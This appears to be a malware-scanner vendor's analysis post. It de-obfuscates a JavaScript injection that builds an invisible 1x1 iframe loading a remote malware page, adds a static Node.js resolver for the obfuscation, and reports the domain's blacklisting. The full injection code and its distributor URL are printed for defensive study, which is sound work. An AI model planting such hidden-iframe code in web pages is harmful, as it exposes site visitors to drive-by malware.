Obfuscated malicious JavaScript code creates iframe and injects into the website page
Background
The Online Website Malware Scanner identified a malicious JavaScript code injection in a scanned website. Obfuscated JavaScript of this kind builds an iframe that is invisible to the website visitor and loads content from a remote malware distributor.
This post describes the detected JavaScript as it was found and then shows how the malicious action is carried out while the page renders. You can try to locate such code on your own website and analyse and remove it if required. This article should not be used as a hacking guide.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources (websites).
Malware entry
Malware entry details.
Beautified script
When scanning a website with the Quttera Website Malware Scanner you can see the Threat Dump field populated with the detected JavaScript code. The de-obfuscated form of one such threat dump looks like this:
    wa = 't';
    p = 'ht';
    f = 'k98';
    tb = 'ame';
    bg = '.';
    v = 'sr';
    g = 'tp:';
    vf = '/z';
    bs = 't';
    px = 'v.h';
    br = 'yt';
    k = 'c';
    yr = 'm';
    ds = 'm';
    ej = '/';
    au = '/';
    t = 'com';
    sp = 'ifr';
    r = 'ca';
    cp = 'y';
    wz = 'ir';
    wf = 'u';
    b = '5';
    se = sp.concat(tb);
    oz = v.concat(k);
    /*
     * set db to point to http: //zirycatum.com/k985ytv.htm
     */
    db = p.concat(g, ej, vf, wz, cp, r, bs, wf, yr, bg, t, au, f, b, br, px, wa, ds);
    var ip = document.createElement(se);
    ip.setAttribute('width', '1');
    ip.setAttribute('height', '1');
    ip.frameBorder = 0;
    ip.setAttribute(oz, db);
    document.body.appendChild(ip);
It did not take much effort to understand what this code does: apart from a few JavaScript method calls, the statements are plain assignments of short string values to variables.
Let's take a look at the interesting parts:
    se = sp.concat(tb);
    oz = v.concat(k);
    db = p.concat(g, ej, vf, wz, cp, r, bs, wf, yr, bg, t, au, f, b, br, px, wa, ds);
Again, this simply joins the string held in p with the strings held by the variables listed in the parentheses, in that order, to get
    db = http: //zirycatum.com/k985ytv.htm
    var ip = document.createElement(se);
As we saw earlier, se = 'iframe', hence ip = document.createElement('iframe'). This is pretty self-explanatory.
Now let's make our iframe invisible, or at least too small to be noticed visually. This is done by the following lines:
    ip.setAttribute('width', '1');
    ip.setAttribute('height', '1');
    ip.frameBorder = 0;
    ip.setAttribute(oz, db);
The last of these is ip.setAttribute('src', 'http: //zirycatum.com/k985ytv.htm'), since oz = 'src' and db holds the URL. Now we are all set to inject the freshly created iframe into the rendered document:
    document.body.appendChild(ip);
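As an added example (not code from the original post or from Quttera), the following JavaScript statically resolves the string-splitting pattern walked through above without ever executing the script: it evaluates only the `x = 'literal'` assignments and the `a.concat(...)` calls, then rewrites the remaining DOM statements with the recovered strings so the `createElement` / `setAttribute('src', ...)` / `appendChild` sequence can be read directly. The sample it works on is constructed to mirror the threat dump; its fragments spell a placeholder host, example.invalid, rather than the domain in the post. Run it with Node.js.

```javascript
// Added example, not part of the original post: a static resolver for the
// string-splitting obfuscation analysed above. It never runs the sample. It
// only evaluates `x = 'literal';` assignments and `a.concat(b, c, ...)` calls
// over already-known variables, then substitutes the recovered strings into
// the remaining statements (the DOM calls) so an analyst can read them.

// Constructed sample in the same shape as the threat dump in the post. The
// fragments spell a placeholder URL (example.invalid), not the live domain.
const SAMPLE = `
wa = 'tm'; p = 'ht'; f = 'pay'; tb = 'ame'; v = 'sr'; g = 'tp:'; vf = '/ex';
bs = '.in'; br = '.h'; k = 'c'; ej = '/'; au = '/'; sp = 'ifr'; r = 'e';
cp = 'pl'; wz = 'am'; wf = 'val'; yr = 'id'; b = 'load';
se = sp.concat(tb);
oz = v.concat(k);
/* the next line rebuilds the payload URL */
db = p.concat(g, ej, vf, wz, cp, r, bs, wf, yr, au, f, b, br, wa);
var ip = document.createElement(se);
ip.setAttribute('width', '1');
ip.setAttribute('height', '1');
ip.frameBorder = 0;
ip.setAttribute(oz, db);
document.body.appendChild(ip);
`;

// A concat operand is either a quoted literal or a previously resolved variable.
function resolveOperand(token, vars) {
  const lit = token.match(/^'([^']*)'$/);
  return lit ? lit[1] : vars.get(token); // undefined if the variable is unknown
}

// Returns { vars: Map<name, string>, sinks: string[] }. Statements are split on
// ';', so a ';' inside a string literal would need a real tokenizer (limitation).
function deobfuscate(source) {
  const vars = new Map();  // variable name -> recovered string value
  const sinks = [];        // statements that do something other than build strings
  const code = source.replace(/\/\*[\s\S]*?\*\//g, ''); // drop block comments
  for (const raw of code.split(';')) {
    const stmt = raw.trim();
    if (!stmt) continue;
    let m = stmt.match(/^(?:var\s+)?(\w+)\s*=\s*'([^']*)'$/);
    if (m) { vars.set(m[1], m[2]); continue; }
    m = stmt.match(/^(?:var\s+)?(\w+)\s*=\s*(\w+)\.concat\((.*)\)$/);
    if (m) {
      const operands = [m[2], ...m[3].split(',').map(s => s.trim()).filter(Boolean)];
      const values = operands.map(op => resolveOperand(op, vars));
      if (values.every(v => v !== undefined)) { vars.set(m[1], values.join('')); continue; }
    }
    // Everything else is behaviour: substitute recovered strings for identifiers,
    // leaving anything already inside quotes untouched.
    sinks.push(stmt.replace(/'[^']*'|\b[A-Za-z_]\w*\b/g,
      tok => (tok.startsWith("'") || !vars.has(tok)) ? tok : `'${vars.get(tok)}'`));
  }
  return { vars, sinks };
}

// Heuristic for the pattern in the post: an iframe is created, given a src and
// appended to the document. Returns the src URLs found, or [] if the pattern is absent.
function findInjectedIframeSources(sinks) {
  const text = sinks.join(';\n');
  if (!/createElement\('iframe'\)/.test(text) || !/appendChild\(/.test(text)) return [];
  const urls = [];
  for (const m of text.matchAll(/setAttribute\('src',\s*'([^']*)'\)/g)) urls.push(m[1]);
  return urls;
}

const result = deobfuscate(SAMPLE);
console.log(result.sinks.join(';\n') + ';');
console.log('injected iframe sources:', findInjectedIframeSources(result.sinks));
```

The output is the same six DOM statements as in the walkthrough, with `se`, `oz` and `db` replaced by `'iframe'`, `'src'` and the rebuilt URL, which is exactly what an analyst wants to read before deciding whether a file is part of an injection. Because nothing is executed, the resolver is safe to run over threat dumps pulled from a scanner; the trade-off is that it only understands this one obfuscation shape, so anything using other string-building tricks falls through into the sinks list unresolved rather than being misreported.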
Blacklisting status
Now let's see whether the redirection is really malicious. Let's check the domain in the Quttera scanner again.
Although Quttera detected only a single Potentially Suspicious file and no active malware at the time of writing, both Google and MalwareDomainList had already added this domain to their blacklists.
The website is flagged as Suspicious on Google Safe Browsing for hosting malware, and it is listed in MalwareDomainList for redirecting to a fake AV.
Malware clean-up
Such malware is often hidden inside a JavaScript file. If you suspect that your website has been infected by similar malware, please use Website Anti-malware Monitoring for a remediation assessment.